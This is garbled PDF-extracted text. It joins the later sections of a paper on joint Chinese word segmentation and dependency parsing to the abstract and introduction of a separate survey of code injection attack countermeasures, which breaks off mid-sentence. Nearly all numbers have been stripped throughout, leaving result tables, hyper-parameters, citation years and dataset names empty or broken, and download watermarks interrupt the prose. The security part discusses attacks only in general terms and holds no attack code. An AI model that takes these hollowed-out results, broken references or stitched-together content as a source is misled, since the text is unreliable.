tree based on the predicted character-level arc labels. the characters with continuous ‘‘app’’ are regarded as one word. and the predicted head character of the last character is viewed as this word’s head. because the predicted arc points to a character, we regard the word that contains this head character as the head word. . models for word segmentation only the proposed model can be also used for the cws task solely. without considering the parsing task, we first assign a leftward unlabeled arc by default for every two adjacent characters, and then predict the arc labels that indicate the boundary of segmentation. in the task of word segmentation only, there are two kinds of arc labels: ‘‘seg’’ and ‘‘app’’. ‘‘seg’’ means there is a segmentation be- tween its connected characters, and ‘‘app’’ means its connected characters belong to one word. be- cause the unlabeled arcs are assigned in advance, we just use eq. ( ) ∼ ( ) to predict the labels: ‘‘seg’’ and ‘‘app’’. thus, the word segmentation task is transformed into a binary classification problem. figure gives an illustration of the labeled arcs for the task of word segmentation only. experiments . datasets we use the penn chinese treebank . (ctb- ), . (ctb- ), and . (ctb- ) datasets to evaluate our models (xue et al., ). for ctb- , the training set is from sections ∼ , ∼ , and ∼ , the development set is from section ∼ , and the test set is from section ∼ ; this splitting was also adopted by zhang and clark ( ), zhang et al. ( ), and kurita et al. ( ). for ctb- , we use the same split https://catalog.ldc.upenn.edu/ldc t . https://catalog.ldc.upenn.edu/ldc t . https://catalog.ldc.upenn.edu/ldc t . as wang et al. ( ), zhang et al. ( ), and kurita et al. ( ). for ctb- , we use the dev and test files proposed by shao et al. ( ), and we regard all left files as the training data. . measures following hatori et al. ( ), zhang et al. ( , ), and kurita et al. ( ), we use standard measures of word-level f , precision, and recall scores to evaluate word segmentation and dependency parsing (for both unlabeled and labeled scenario) tasks. we detail them in the following. • f seg: f measure of cws. this is the stan- dard metric used in the cws task (qiu et al., ; chen et al., ). • f udep: f measure of unlabeled dependency parsing. following hatori et al. ( ), zhang et al. ( , ), and kurita et al. ( ), we use standard measures of word-level f , precision, and recall score to evaluate dependency parsing. in the scenario of joint word segmentation and dependency parsing, the widely used unlabeled attachment score (uas) is not enough to measure the perfor- mance, since the error arises from two as- pects: one is caused by word segmentation and the other is due to the wrong prediction on the head word. a dependent-head pair is correct only when both the dependent and head words are accurately segmented and the dependent word correctly finds its head word. the precision of unlabeled dependency parsing (denoted as pudep) is calculated by the correct dependent-head pair versus the total number of dependent-head pairs (namely the number of segmented words). the recall of unlabeled dependency parsing (denoted as rudep) is computed by the correct dependent- head pair versus the total number of golden dependent-head pairs (namely, the number of golden words). the calculation of f udep is like f seg. • f ldep: f measure of labeled dependency parsing. the only difference from f udep is that except for the match between the head and dependent words, the pair must have the same label as the golden dependent-head pair. the precision and recall are calculated correspondingly. because the number of downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://catalog.ldc.upenn.edu/ldc t https://catalog.ldc.upenn.edu/ldc t https://catalog.ldc.upenn.edu/ldc t golden labeled dependent-head pairs and predicted labeled dependent-head pairs are the same with the counterparts of unlabeled dependency parsing, the value of f ldep can- not be higher than f udep. a more detailed description of dependency parsing metrics can be found in kübler et al. ( ). the uas, las equal to the value of the recall of unlabeled dependency parsing (rudep) and the recall of labeled dependency parsing (rldep), respectively. we also report these two values in our experiments. . experimental settings pre-trained embedding based on shao et al. ( ); zhang et al. ( ), n-grams are of great benefit to cws and pos tagging tasks. thus we use unigram, bigram, and trigram embeddings for all of our character-based models. we first pre-train unigram, bigram, and trigram embed- dings on the chinese wikipedia corpus by the method proposed in ling et al. ( ), which improves standard word vec by incorporating token order information. for a sentence with char- acters ‘‘abcd...’’, the unigram sequence is ‘‘a b c ...’’; the bigram sequence is ‘‘ab bc cd ...’’; and the trigram sequence is ‘‘abc bcd ...’’. for our word dependency parser, we use tencent’s pre-trained word embeddings (song et al., ). because tencent’s pre-trained word embedding dimension is , we set both pre-trained and random word embedding dimension as for all of our word dependency parsing models. all pre-trained em- beddings are fixed during our experiments. in addition to the fixed pre-trained embeddings, we also randomly initialize embeddings, and element- wisely add the pre-trained and random embed- dings before other procedures. for a model with bert encoding layer, we use the chinese bert- base released in cui et al. ( ). hyper-parameters the development set is used for parameter tuning. all random weights are ini- tialized by xavier normal initializer (glorot and bengio, ). for bilstm based models, we generally fol- low the hyper-parameters chosen in dozat and manning ( ). the model is trained with the adam algorithm (kingma and ba, ) to minimize the sum of the cross-entropy of arc pre- dictions and label predictions. after each training embedding dimension bilstm hidden size gradients clip batch size embedding dropout . lstm dropout . arc mlp dropout . label mlp dropout . lstm depth mlp depth arc mlp size label mlp size learning rate e- annealing . t/ β , β . max epochs table : hyper-parameter settings. epoch, we test the model on the dev set, and models with the highest f udep in development set are used to evaluate on the test sets; the results reported for different datasets in this paper are all on their test set. detailed hyper-parameters can be found in table . for bert based models, we use the adamw optimizer with a triangle learning rate warmup, the maximum learning rate is e− (loshchilov and hutter, ; devlin et al., ). it optimizes for five epochs, the model with the best development set performance is used to evaluate on the test sets. . proposed models in this section, we introduce the settings for our proposed joint models. based on the way the model uses dependency parsing labels and encod- ing layers, we divide our models into four kinds. we enumerate them as follows. • joint-segonly model: the proposed model can be also used for word segmentation task only. in this scenario, the dependency arcs are just allowed to appear in two adjacent characters and label ∈ {app, seg}. this model is described in section . . • joint-binary model: this scenario means label ∈ {app, dep}. in this situation, the label information of all the dependency arcs is ignored. each word-level dependency arc is labeled as dep, the intra-word depen- dency is regarded as app. characters with downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models ctb- ctb- ctb- f seg f udep f seg f udep f seg f udep hatori et al. ( ) . . . . − − zhang et al. ( ) std . . . . − − zhang et al. ( ) eag . . . . − − zhang et al. ( ) . . − − − − kurita et al. ( ) . . . . − − joint-binary . . . . . . joint-multi . . . . . . joint-multi-bert . . . . . . std and eag in zhang et al. ( ) denote the arc-standard and the arc-eager models. f seg and f udep are the f score for chinese word segmentation and unlabeled dependency parsing, respectively. table : main results in the test set of different datasets. our joint-multi model achieves superior performance than previous joint models. the joint-multi-bert further enhances the performance of dependency parsing significantly. continuous app label will be joined together and viewed as one word. the dep label indicates this character is the end of a word. • joint-multi model: this scenario means label ∈ {app, dep , · · · , depk}, where k is the number of types of dependency arcs. the intra-word dependency is viewed as app. the other labels are the same as the original arc labels. but instead of representing the relationship between two words, the labeled arc represents the relationship between the last character of the dependent word and the last character of the head word. • joint-multi-bert model: for this kind of model, the encoding layer is bert. and it uses the same target scenario as the joint- multi model. . comparison with the previous joint models in this section, we mainly focus on the perfor- mance comparison between our proposed models and the previous joint models. because the pre- vious models just deal with the unlabeled depen- dency parsing, we just report the f seg and f udep here. as presented in table , our model (joint- binary) outpaces previous methods with a large margin in both cws and dependency parsing, even without the local parsing features that were extensively used in previous transition-based joint work (hatori et al., ; zhang et al., , ; kurita et al., ). another difference between our joint models and previous works is the combination of pos tags; the previous models all used the pos task as one componential task. despite the lack of pos tag information, our mod- els still achieve much better results. however, according to dozat and manning ( ), pos tags are beneficial to dependency parsers, there- fore one promising direction of our joint model might be incorporating pos tasks into this joint model. other than the performance distinction between previous work, our joint model with or without dependency labels also differ from each other. it is clearly shown in table that our joint model with labeled dependency parsing (joint-multi) outperforms its counterpart (joint-binary) in both cws and dependency parsing. with respect to the enhancement of dependency parsing caused by the arc labels, we believe it can be credited to two aspects. the first one is the more accurate cws. the second one is that label information between two characters will give extra supervision for the search of head characters. the reason why labeled dependency parsing is conducive to cws will be also analyzed in section . . owing to the joint decoding of cws and de- pendency parsing, we can utilize the character- level pre-trained language model bert. the last row of table displays that the f udep can be substantially increased when bert is used, even when the performance of cws not improve too much. we presume this indicates that bert can better extract the contextualized information to help the dependency parsing. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models tag set ctb- ctb- ctb- f seg pseg rseg f seg pseg rseg f seg pseg rseg lstm+mlp {b, m, e, s} . . . . . . . . . lstm+crf {b, m, e, s} . . . . . . . . . lstm+mlp {app, seg} . . . . . . . . . joint-segonly {app, seg} . . . . . . . . . joint-binary {app, dep} . . . . . . . . . joint-multi {app, dep , · · · , depk} . . . . . . . . . joint-multi-bert {app, dep , · · · , depk} . . . . . . . . . the upper part refers the models based on sequence labeling. the lower part refers our proposed joint models which are detailed in section . . the proposed joint models achieve near or better f seg than models trained only on chinese word segmentation. f seg, pseg, and rseg are the f , precision, and recall of cws, respectively. table : results of chinese word segmentation. . chinese word segmentation in this part, we focus on the performance of our model for the cws task only. most of state-of-the-art cws methods are based on sequence labeling, in which every sentence is transformed into a sequence of{b, m, e, s} tags. b represents the begin of a word, m represents the middle of a word, e represents the end of a word, and s represents a word with only one character. we compare our model with these state-of-the-art methods. • lstm+mlp with {b, m, e, s} tags. fol- lowing ma et al. ( ), we tried to do cws without conditional random fields (crfs). after bilstm, the hidden states of each character further forwards into a multi-layer perceptron (mlp), so that every character can output a probability distribution over the label set. the viterbi algorithm is utilized to find the global maximum label sequence when testing. • lstm+crf with {b, m, e, s} tags. the only difference between this scenario and the previous one is whether using crf after the mlp (lafferty et al., ; chen et al., ). • lstm+mlp with {app, seg} tags. the seg- mentation of a chinese sentence can be represented by a sequence of {app, seg}, where app represents that the next character and this character belongs to the same word, and seg represents that this character is the last character of a word. therefore, cws can be viewed as a binary classification prob- lem. except for the tag set, this model’s architecture is similar to the lstm+mlp scenario. all of these models use the multi-layer bilstm as the encoder; they differ from each other in their way of decoding and the tag set. the number of bilstm layers is and the hidden size is . the performance of all models are listed in table . the first two rows present the difference between whether utilizing crf on the top of mlp. crf performance is slightly better than its counterpart. the first row and the third row display the comparison between different tag scenarios, the {b, m, e, s} tag set is slightly better than the {app, seg} tag set. different from the competitor sequence labeling model (lstm+mlp with {app, seg} tag set), our joint-segonly model uses the biaffine to model the interaction between the two adjacent characters near the boundary and achieves slightly better or similar performances on all datasets. the empirical results in the three datasets suggest that modeling the interaction between two consecutive characters are helpful to cws. if two characters are of high probability to be in a certain depen- dency parsing relationship, there will be a greater chance that one of the characters is the head character. the lower part of table shows the segmen- tation evaluation of the proposed joint models. jointly training cws and dependency parsing achieves comparable or slightly better cws than training cws alone. although head prediction is not directly related to cws, the head character can downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models ctb- ctb- ctb- f seg f udep uas f ldep las f seg f udep uas f ldep las f seg f udep uas f ldep las biaffine† − − . − . − − . − . − − . − . pipeline§ . . . . . . . . . . . . . . . joint-multi . . . . . . . . . . . . . . . joint-multi-bert . . . . . . . . . . . . . . . † the results are evaluated by a word-level biaffine parser on the gold-segmented sentences. § the pipeline model first uses the joint-segonly model to segment the sentence, then uses the word-level biaffine parser to obtain the parsing result. table : comparison with the pipeline model. our joint-multi models outperform the pipeline models in a large margin. when bert is used, the dependency parsing performance was significantly improved, although the chinese word segmentation does not meliorate a lot. models ctb- ctb- ctb- f seg f udep uas f ldep las f seg f udep uas f ldep las f seg f udep uas f ldep las joint-multi . . . . . . . . . . . . . . . -pre-trained . . . . . . . . . . . . . . . -n-gram . . . . . . . . . . . . . . . the ‘-pre-trained’ means the model is trained without the pre-trained embeddings. the ‘-n-gram’ means the model is trained by removing the bigram and trigram embeddings, only randomly initialized and pre-trained character embeddings are used. table : ablation experiments for joint-multi models. only be the end of a word, therefore combination between cws and character dependency pars- ing actually introduces more supervision for the former task. on ctb- , the joint-binary and joint- multi models are slightly worse than the joint- segonly model. the reason may be that the ctb- dataset is relatively small and the complicated models suffer from the overfitting. from the last row of table , bert can further enhance the model’s performance on cws. another noticeable phenomenon from the lower part of table is that the labeled dependency pars- ing brings benefit to cws. we assume this is be- cause the extra supervision from dependency parsing labels is informative for word segmentation. . comparison with the pipeline model in this part, we compare our joint model with the pipeline model. the pipeline model first uses our best joint-segonly model to obtain segmenta- tion results, then applies the word-based biaffine parser to parse the segmented sentence. the word- level biaffine parser is the same as in dozat and manning ( ) but without pos tags. just like the joint parsing metric, for a dependent-head word pair, only when both head and dependent words are correct can this pair be viewed as a right one. table obviously shows that in ctb- , ctb- , and ctb- , the joint-multi model consistently outperforms the pipeline model in f udep, uas, f ldep, and las. although the f seg difference between the joint-multi model and the pipeline model is only − . , + . , + . in ctb- , ctb- , and ctb- , respectively, the f udep of the joint-multi is higher than the pipeline model by + . , + . , and + . , respectively; we believe this indicates the better resistance to error propagation of the joint-multi model. additionally, when bert is used, f udep, uas, f ldep, and las are substantially im- proved, which represents that our joint model can take advantage of the power of bert. in ctb- , the joint model even achieves better uas than the gold-segmented word-based model. and for the las, joint-multi-bert models also achieve better results in ctb- and ctb- . we presume the reason that performance of cws does not improve as much as dependency parsing is that the falsely segmented words in joint-multi-bert are mainly segmenting a long word into several short words or recognizing several short words as one long word. . ablation study as our model uses various n-gram pre-trained em- beddings, we explore the influence of these pre- trained embeddings. the second row in table shows the results of the joint-multi model without pre-trained embeddings; it is clear that pre-trained downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models ctb- ctb- ctb- pudep seg-wrong head-wrong pudep seg-wrong head-wrong pudep seg-wrong head-wrong pipeline . % . % . % . % . % . % . % . % . % joint-multi . % . % . % . % . % . % . % . % . % joint-multi-bert . % . % . % . % . % . % . % . % . % the value of pudep is the percentage that the predicted arc is correct. ‘seg-wrong’ means that either head or dependent (or both) is wrongly segmented. ‘head-wrong’ means that the word is correctly segmented but the predicted head word is wrong. table : error analysis of unlabeled dependency parsing in the test set of different datasets. embeddings are important for both the word seg- mentation and dependency parsing. we also tried to remove the bigram and tri- gram. results are illustrated in the third row of table . compared with the joint-multi model, without bigram and trigram, it performs worse in all metrics. however, the comparison between the second row and the third row shows diver- gence in cws and dependency parsing for datasets ctb- and ctb- . for cws, the model without pre-trained embeddings obtains superior perfor- mance than without the bigram and trigram fea- ture, whereas for all dependency parsing related metrics, the model with pre-trained character em- bedding obtains better performance. we assume the n-gram features are important to chinese word segmentation. for the dependency parsing task, however, the relation between two characters are more beneficial; when pre-trained embeddings are combined, the model can exploit the relationship encoded in the pre-trained embeddings. addition- ally, for ctb- and ctb- , even though the third row has inferior f seg (on average . % lower than the second row), it still achieves much better f udep (on average . % higher than the second row). we believe this is a proof that joint cws and dependency parsing is resistant to error prop- agation. the higher segmentation and dependency parsing performance for the model without pre- trained embedding in ctb- might be owing to its large training set, which can achieve better results even from randomly initialized embeddings. . error analysis apart from performing the standard evaluation, we investigate where the dependency parsing head prediction error comes from. the errors can be divided into two kinds, ( ) either the head or dependent (or both) is wrongly segmented, or ( ) there is the wrong choice on the head word. the ratio of these two mistakes is presented in table . for the joint-multi model, more mistakes caused by segmentation in ctb- is coherent with our observation that ctb- bears lower cws per- formance. based on our error analysis, the wrong prediction of head word accounts for most of the errors, therefore further joint models addressing head prediction error problem might result in more gain on performance. additionally, although from table the dis- tinction of f seg between the joint-multi model and the pipeline model is around + . % on aver- age, the difference between the head-wrong is more than around + . % in average. we think this is caused by the pipeline model, in which is more sensitive to word segmentation errors and suffers more from the oov problem, as depicted in figure . from the last row of table , joint- multi-bert achieves excellent performance on dependency parsing because it can significantly reduce errors caused by predicting the wrong head. conclusion and future work in this paper, we propose a graph-based model for joint chinese word segmentation and dependency parsing. different from the previous joint models, our proposed model is a graph-based model and is more concise, which results in fewer efforts of feature engineering. although no explicit hand- crafted parsing features are applied, our joint model outperforms the previous feature-riched joint models by a large margin. the empirical re- sults in ctb- , ctb- , and ctb- show that the dependency parsing task is also beneficial to chinese word segmentation. additionally, labeled dependency parsing not only is good for chinese word segmentation, but also avails the dependency parsing head prediction. apart from good performance, the comparison between our joint model and the pipeline model downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : parsing results of different models. the red dashed box means the dependency label is wrong. the red dashed edge means this dependency arc does not exist. although the pipeline model has the right word segmentation, ‘‘ ’’ is an out-of-vocabulary word. therefore, it fails to find the right dependency relation and adversely affects predictions afterward. the joint-multi model can still have a satisfying outcome even with wrong segmentation, which depicts that the joint-multi model is resistant to wrong word segmentations. the joint-multi-bert correctly finds the word segmentation and dependency parsing. shows great potentialities for character-based chinese dependency parsing. and owing to the joint decoding between chinese word segmen- tation and dependency parsing, our model can use a pre-trained character-level language model (such as bert) to enhance the performance further. after the incorporation of bert, the perfor- mance of our joint model increases substantially, resulting in the character-based dependency pars- ing performing near the gold-segmented word- based dependency parsing. our proposed method not merely outpaces the pipeline model, but also avoids the preparation for pre-trained word embeddings that depends on a good chinese word segmentation model. in order to fully explore the possibility of graph- based chinese dependency parsing, future work should be done to incorporate pos tagging into this framework. additionally, as illustrated in zhang et al. ( ), a more reasonable intra-word dependent structure might further boost the perfor- mance of all tasks. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april acknowledgments we would like to thank the action editor and the anonymous reviewers for their insightful com- ments. we also thank the developers of fastnlp, yunfan shao and yining zheng, for developing this handy natural language processing package. this work was supported by the national key research and development program of china (no. yfc ), national natural science foundation of china (no. ), shanghai municipal science and technology major project (no. shzdzx ), and zjlab. references dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in rd international conference on learning repre- sentations, iclr , san diego, ca, usa, may – , , conference track proceedings. xinchi chen, xipeng qiu, and xuanjing huang. . a feature-enriched neural model for joint chinese word segmentation and part-of-speech tagging. in proceedings of the twenty-sixth international joint conference on artificial intelligence, ijcai , melbourne, australia, august – , . xinchi chen, xipeng qiu, chenxi zhu, pengfei liu, and xuanjing huang. . long short- term memory neural networks for chinese word segmentation. in proceedings of the conference on empirical methods in natural language processing, emnlp , lisbon, portugal, september – , . yiming cui, wanxiang che, ting liu, bing qin, ziqing yang, shijin wang, and guoping hu. . pre-training with whole word masking for chinese bert. corr, abs/ . v . jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, naacl-hlt https://github.com/fastnlp/fastnlp. , minneapolis, mn, usa, june – , , volume (long and short papers). timothy dozat and christopher d. manning. . deep biaffine attention for neural depen- dency parsing. in th international conference on learning representations, iclr , toulon, france, april – , , conference track proceedings. xavier glorot and yoshua bengio. . under- standing the difficulty of training deep feed- forward neural networks. in proceedings of the thirteenth international conference on arti- ficial intelligence and statistics, aistats , chia laguna resort, sardinia, italy, may – , . jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint approach to word segmentation, pos tagging, and dependency parsing in chinese. in the th annual meeting of the association for computational linguistics, proceedings of the conference, july – , , jeju island, korea - volume : long papers. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in rd international conference on learning repre- sentations, iclr , san diego, ca, usa, may – , , conference track proceedings. eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing us- ing bidirectional lstm feature representations. transactions of the association for computa- tional linguistics tacl, : – . sandra kübler, ryan t. mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. shuhei kurita, daisuke kawahara, and sadao kurohashi. . neural joint model for transition-based chinese syntactic analysis. in proceedings of the th annual meeting of the association for computational linguistics, acl , vancouver, canada, july - august , volume : long papers. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/fastnlp/fastnlp john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional ran- dom fields: probabilistic models for segment- ing and labeling sequence data. in proceedings of the eighteenth international conference on machine learning (icml ), williams col- lege, williamstown, ma, usa, june - july , . haonan li, zhisong zhang, yuqi ju, and hai zhao. . neural character-level dependency parsing for chinese. in proceedings of the thirty- second aaai conference on artificial intelli- gence, (aaai- ), the th innovative applications of artificial intelligence (iaai- ), and the th aaai symposium on educational advances in artificial intelligence (eaai- ), new orleans, louisiana, usa, february – , . zhenghua li, min zhang, wanxiang che, ting liu, wenliang chen, and haizhou li. . joint models for chinese pos tagging and dependency parsing. in proceedings of the conference on empirical methods in natural language processing, emnlp , – july , john mcintyre conference centre, edinburgh, uk, a meeting of sigdat, a spe- cial interest group of the acl. wang ling, chris dyer, alan w. black, and isabel trancoso. . two/too simple adaptations of word vec for syntax problems. in naacl hlt , the conference of the north american chapter of the association for com- putational linguistics: human language technologies, denver, colorado, usa, may - june , . ilya loshchilov and frank hutter. . de- coupled weight decay regularization. in th international conference on learning repre- sentations, iclr , new orleans, la, usa, may – , . ji ma, kuzman ganchev, and david weiss. . state-of-the-art chinese word segmentation with bi-lstms. in proceedings of the confer- ence on empirical methods in natural language processing, brussels, belgium, october - november , . hwee tou ng and jin kiat low. . chinese part-of-speech tagging: one-at-a-time or all- at-once? word-based or character-based? in proceedings of the conference on em- pirical methods in natural language pro- cessing, emnlp , a meeting of sigdat, a special interest group of the acl, held in conjunction with acl , – july , barcelona, spain. wenzhe pei, tao ge, and baobao chang. . max-margin tensor neural network for chinese word segmentation. in proceedings of the nd annual meeting of the association for com- putational linguistics, acl , june – , , baltimore, md, usa, volume : long papers. xian qian and yang liu. . joint chinese word segmentation, pos tagging and parsing. in proceedings of the joint conference on empirical methods in natural language processing and computational natural lan- guage learning, emnlp-conll , july – , , jeju island, korea. xipeng qiu, jiayi zhao, and xuanjing huang. . joint chinese word segmentation and pos tagging on heterogeneous annotated cor- pora with multiple task learning. in proceedings of the conference on empirical methods in natural language processing, emnlp , – october , grand hyatt seattle, seattle, washington, usa, a meeting of sigdat, a special interest group of the acl. yan shao, christian hardmeier, jörg tiedemann, and joakim nivre. . character-based joint segmentation and pos tagging for chinese using bidirectional rnn-crf. in proceedings of the eighth international joint conference on natural language processing, ijcnlp , taipei, taiwan, november - december , - volume : long papers. tianze shi, liang huang, and lillian lee. . fast(er) exact decoding and global training for transition-based dependency parsing via a minimal feature set. in proceedings of the conference on empirical methods in natural language processing, emnlp , copenhagen, denmark, september – , . yan song, shuming shi, jing li, and haisong zhang. . directional skip-gram: explic- itly distinguishing left and right context for word embeddings. in proceedings of the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april conference of the north american chapter of the association for computational linguistics: human language technologies, naacl-hlt, new orleans, louisiana, usa, june – , , volume (short papers). chi sun, luyao huang, and xipeng qiu. . utilizing bert for aspect-based sentiment analysis via constructing auxiliary sentence. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, naacl-hlt , minneapolis, mn, usa, june – , , volume (long and short papers). yiou wang, jun’ichi kazama, yoshimasa tsuruoka, wenliang chen, yujie zhang, and kentaro torisawa. . improving chinese word seg- mentation and pos tagging with semi-supervised methods using large auto-analyzed data. in fifth international joint conference on natural language processing, ijcnlp , chiang mai, thailand, november – , . zhiguo wang, chengqing zong, and nianwen xue. . a lattice-based framework for joint chinese word segmentation, pos tagging and parsing. in proceedings of the st annual meeting of the association for computational linguistics, acl , – august , sofia, bulgaria, volume : short papers. naiwen xue, fei xia, fu-dong chiou, and martha palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural language engineering, ( ): – . liner yang, meishan zhang, yang liu, maosong sun, nan yu, and guohong fu. . joint pos tagging and dependence parsing with transition-based neural networks. ieee/acm trans. audio, speech & language processing, ( ): – . meishan zhang, nan yu, and guohong fu. . a simple and effective neural model for joint word segmentation and pos tagging. ieee/acm trans. audio, speech & language processing, ( ). meishan zhang, yue zhang, wanxiang che, and ting liu. . character-level chinese depen- dency parsing. in proceedings of the nd annual meeting of the association for com- putational linguistics, acl , june – , , baltimore, md, usa, volume : long papers. yue zhang and stephen clark. . joint word segmentation and pos tagging using a single perceptron. in acl , proceedings of the th annual meeting of the association for computational linguistics, june – , , columbus, ohio, usa. yue zhang and stephen clark. . a fast decoder for joint word segmentation and pos- tagging using a single discriminative model. in proceedings of the conference on empirical methods in natural language processing, emnlp , – october , mit stata center, massachusetts, usa, a meeting of sigdat, a special interest group of the acl. yuan zhang, chengtao li, regina barzilay, and kareem darwish. . randomized greedy inference for joint segmentation, pos tagging and dependency parsing. in naacl hlt , the conference of the north american chapter of the association for computational linguistics: human language technologies, denver, colorado, usa, may - june , . xiaoqing zheng, hanyang chen, and tianyu xu. . deep learning for chinese word seg- mentation and pos tagging. in proceedings of the conference on empirical methods in natural language processing, emnlp , – october , grand hyatt seattle, seattle, washington, usa, a meeting of sigdat, a special interest group of the acl. ming zhong, pengfei liu, danqing wang, xipeng qiu, and xuanjing huang. . searching for effective neural extractive summarization: what works and what’s next. in proceedings of the th conference of the association for com- putational linguistics, acl , florence, italy, july - august , , volume : long papers. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction related work joint segmentation and pos tagging joint pos tagging and dependency parsing joint segmentation, pos tagging, and dependency parsing proposed model encoding layer bilstm-based encoding layer bert-based encoding layer biaffine layer unlabeled arc prediction arc label prediction models for word segmentation only experiments datasets measures experimental settings proposed models comparison with the previous joint models chinese word segmentation comparison with the pipeline model ablation study error analysis conclusion and future work submitted january accepted october published november corresponding author dimitris mitropoulos, dimitro@aueb.gr academic editor cynthia irvine additional information and declarations can be found on page doi . /peerj-cs. copyright mitropoulos and spinellis distributed under creative commons cc-by . open access fatal injection: a survey of modern code injection attack countermeasures dimitris mitropoulos and diomidis spinellis department of management science and technology, athens university of economics and business, greece abstract with a code injection attack (cia) an attacker can introduce malicious code into a computer program or system that fails to properly encode data that comes from an untrusted source. a cia can have different forms depending on the execution context of the application and the location of the programming flaw that leads to the attack. currently, cias are considered one of the most damaging classes of application attacks since they can severely affect an organisation’s infrastructure and cause financial and reputational damage to it. in this paper we examine and categorize the countermeasures developed to detect the various attack forms. in particular, we identify two distinct categories. the first incorporates static program analysis tools used to eliminate flaws that can lead to such attacks during the development of the system. the second involves the use of dynamic detection safeguards that prevent code injection attacks while the system is in production mode. our analysis is based on nonfunctional characteristics that are considered critical when creating security mechanisms. such characteristics involve usability, overhead, implementation dependencies, false positives and false negatives. our categorization and analysis can help both researchers and practitioners either to develop novel approaches, or use the appropriate mechanisms according to their needs. subjects security and privacy keywords application security, code injection attacks, countermeasures, static analysis, dynamic prevention, software vulnerabilities, cross-site scripting introduction and covered area security vulnerabilities derive from a small number of programming flaws that lead to security breaches (wurster & van oorschot, ; viega & mcgraw, ). one common mistake that developers make concerns user input, assuming, for example, that only word characters will be entered by the user, or that the user input will never exceed a certain length (mitropoulos et al., ). developers may assume, correctly, that a high-level language in an application will protect them against threats like buffer overflows (keromytis, ). developers may also assume, incorrectly, that user input is not a security issue any more. such an assumpion can lead to the processing of invalid data that an attacker can introduce into a program and cause it to execute malicious code. this kind of exploit is known as a code injection attack (cia) (ray & ligatti, ; mitropoulos et al., ). code injection attacks have been topping the vulnerability lists of numerous bulletin providers for several years. (http://www.sans.org/top-cyber-security-risks/, http://cwe.mitre.org/top /) consider the open web application security project how to cite this article mitropoulos and spinellis ( ), fatal injection: a survey of modern code injection attack countermeasures. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:dimitro@aueb.gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://www.sans.org/top-cyber-security-risks/ http://cwe.mitre.org/top / http://dx.doi.org/ . /peerj-cs. (https://www.owasp.org/index.php/category:owasp_top_ten_project) (owasp) top ten project which represents a broad consensus about what the most critical web application security flaws are, and is referenced by payment card industry security standards council (https://www.pcisecuritystandards.org/security_standards/) (pci dss), defense information systems agency (www.disa.mil/) (disa) and numerous researchers. in its three consecutive top ten lists ( , , ), different classes of code injection are included in the top five positions. over several years of efforts, a large body of knowledge has been assembled regarding code injection attacks consisting of countermeasures, novel ways of attacking, and others. in this paper we first identify the basic categories of cias (‘code injection attacks’). then, we analyze the basic approaches used to counter such attacks, and the mechanisms that implement them (‘countermeasures’). specifically, there are two categories of countermeasures that can be used by developers to: (a) identify and eliminate the vulnerabilities that the system contains during the development process, (b) guard the system against code injection attacks while it is in production mode. then, we highlight the positive and negative aspects of each countermeasure and finally we evaluate them based on the following requirements (see ‘analysis and discussion’): • flexibility: we check if an approach can be adjusted in order to detect different code injection attack categories. • effectiveness tests: as long as we examine security mechanisms that detect either attacks or defects, we want to see if researchers have measured the effectiveness of their proposed mechanisms in terms of false positive and negative rates. • implementation independence: we check if the mechanisms depend either on the characteristics of the programming language that was used to develop them or on the implementation details of the protecting entity. • computational overhead: finally, we examine if a mechanisms imposes a cost due to its use, as it may introduce an amount of extra computation on an application. all the aforementioned requirements are considered critical when building security mechanisms (anderson, ; romero-mariona et al., ; mellado, fernández-medina & piattini, ; halfond, viegas & orso, ). finally, we discuss some emerging challenges for future research on the field (‘emerging challenges’), and provide some general observations together with some concluding remarks (‘conclusions’). there is already a survey on mitigating software vulnerabilities in general (shahriar & zulkernine, ). the scope of that research is very broad and leaves out many approaches and mechanisms that we report here. also, countermeasures that prevent two subcategories, namely: binary code injection (younan, joosen & piessens, ) and sql injection (halfond, viegas & orso, ) in particular, have already been surveyed. the body of work done on the field though, exceeds the boundaries of this research too. furthermore, in the latter case (halfond, viegas & orso, ), the survey is quite old and since then the number of countermeasures that detect sql injection attacks alone, has doubled. finally, the authors of this survey do not take false positives and false negatives into account in their research. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.owasp.org/index.php/category:owasp_top_ten_project https://www.pcisecuritystandards.org/security_standards/ www.disa.mil/ http://dx.doi.org/ . /peerj-cs. code injection attacks code injection is a technique to introduce malicious code into a computer program by taking advantage of unchecked or wrong assumptions the program makes about its inputs (mitropoulos et al., ). bratus et al. ( ) portray the issue in a generic fashion: ‘‘unexpected (and unexpectedly powerful) computational models inside targeted systems, which turn a part of the target into a so-called ‘‘weird machine’’ programmable by the attacker via crafted inputs (a.k.a. 